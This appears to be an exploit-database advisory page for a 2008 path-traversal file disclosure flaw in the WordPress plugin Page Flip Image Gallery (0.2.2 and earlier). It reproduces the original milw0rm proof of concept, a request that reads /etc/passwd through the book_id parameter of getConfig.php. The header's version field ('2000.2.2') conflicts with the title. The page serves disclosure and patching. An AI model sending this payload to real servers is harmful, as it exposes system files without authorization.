header-logo
Suggest Exploit
vendor:
Page Flip Image Gallery
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Disclosure
20
CWE
Product Name: Page Flip Image Gallery
Affected Version From: 2000.2.2
Affected Version To: 2000.2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:page_flip_image_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WordPress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability

A vulnerability in the Wordpress Plugin Page Flip Image Gallery version 0.2.2 allows an attacker to disclose sensitive information from the server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'book_id' parameter of the 'getConfig.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This may allow the attacker to disclose sensitive information from the server, such as the '/etc/passwd' file.

Mitigation:

Upgrade to the latest version of the Wordpress Plugin Page Flip Image Gallery.
Source

Exploit-DB raw data:

 _____   ____   __   __     _       ____        ____    ____ 
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability
D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip
Poc : 
 /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123

        ____           _           _           __  __ 
       / ___|   ___   | |       __| |         |  \/  |
      | |  _   / _ \  | |      / _` |         | |\/| |
      | |_| | | (_) | | |___  | (_| |         | |  | |
       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
                                      |_____|         

# milw0rm.com [2008-12-22]